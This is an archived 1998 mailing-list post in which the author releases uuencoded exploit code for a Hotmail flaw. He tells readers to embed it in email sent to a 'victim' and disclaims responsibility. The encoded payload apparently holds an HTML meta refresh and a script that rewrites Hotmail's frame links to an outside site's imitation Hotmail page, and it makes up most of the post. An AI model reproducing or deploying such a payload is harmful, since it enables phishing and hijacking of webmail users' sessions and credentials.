SV: Serious Security Hole in Hotmail

From: Jonathan James (jamesat_private)
Date: Wed Aug 26 1998 - 09:21:40 PDT

  • Next message: Paul Boehm: "[paulat_private: [cert-advisoryat_private: CERT Summary CS-98.07]]"

     Dear all.
    I've got some e-mail-requests concerning my "second" version of the
    "hotmail flaw", so I've decided to post the code. This has been tested on
    IE 4.0 > and Netscape 3.0 >.
    The code attached should be inserted into the mail that is sent to the
    victim.
    Remember. I may NOT be responsible for any of your actions, when
    implementing the contents of the attached file etc.
    Thankyou.
    
    Regards
    
    begin 600 message2.txt
    M/&AT;6P^#0H\;65T82!H='1P+65Q=6EV/2)R969R97-H(B!C;VYT96YT/2(Q
    M.R!U<FP]:'1T<#HO+W=W=RYB96-A=7-E+7=E+6-A;BYC;VTO:&]T;6%I;"]D
    M969A=6QT+FAT;2(^#0H\:&5A9#X\+VAE860^/&)O9'D^#0H\4#Y(;W1M86EL
    M(&9L87<N("AS96-O;F0@=F5R<VEO;BD-"CQS8W)I<'0^#0IE<G)U<FP](FAT
    M=' Z+R]H='1P.B\O=W=W+F)E8V%U<V4M=V4M8V%N+F-O;2]H;W1M86EL+V1E
    M9F%U;'0N:'1M(CL-"@T*;F]M96YU;&EN:W,]=&]P+G-U8FUE;G4N9&]C=6UE
    M;G0N;&EN:W,N;&5N9W1H.PT*9F]R*&D],#MI/&YO;65N=6QI;FMS+3$[:2LK
    M*7L-"G1O<"YS=6)M96YU+F1O8W5M96YT+FQI;FMS6VE=+G1A<F=E=#TB=V]R
    M:R([#0IT;W N<W5B;65N=2YD;V-U;65N="YL:6YK<UMI72YH<F5F/65R<G5R
    M;#L-"GT-"FYO=V]R:VQI;FMS/71O<"YW;W)K+F1O8W5M96YT+FQI;FMS+FQE
    M;F=T:#L-"F9O<BAI/3 [:3QN;W=O<FML:6YK<RTQ.VDK*RE[#0IT;W N=V]R
    M:RYD;V-U;65N="YL:6YK<UMI72YT87)G970](G=O<FLB.PT*=&]P+G=O<FLN
    M9&]C=6UE;G0N;&EN:W-;:5TN:')E9CUE<G)U<FP[#0I]#0H\+W-C<FEP=#X-
    5"CPO8F]D>3X-"CPO:'1M;#X-"@T*
    `
    end
    



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:13:33 PDT